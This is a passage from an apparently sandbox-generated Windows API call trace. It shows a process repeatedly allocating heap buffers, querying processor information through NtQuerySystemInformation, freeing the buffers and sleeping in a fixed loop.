Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.065] Sleep (dwMilliseconds=0x110) [0233.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.081] Sleep (dwMilliseconds=0x110) [0233.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.101] Sleep (dwMilliseconds=0x110) [0233.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.114] Sleep (dwMilliseconds=0x110) [0233.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.125] Sleep (dwMilliseconds=0x110) [0233.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.147] Sleep (dwMilliseconds=0x110) [0233.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.162] Sleep (dwMilliseconds=0x110) [0233.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.178] Sleep (dwMilliseconds=0x110) [0233.184] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.184] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.191] Sleep (dwMilliseconds=0x110) [0233.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.207] Sleep (dwMilliseconds=0x110) [0233.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.226] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.226] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.226] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.227] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.227] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.227] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.228] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.228] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.228] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.228] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.228] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.229] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.229] Sleep (dwMilliseconds=0x110) [0233.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.239] Sleep (dwMilliseconds=0x110) [0233.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.255] Sleep (dwMilliseconds=0x110) [0233.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.270] Sleep (dwMilliseconds=0x110) [0233.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.284] HeapFree (in: hHeap=0x2560000, 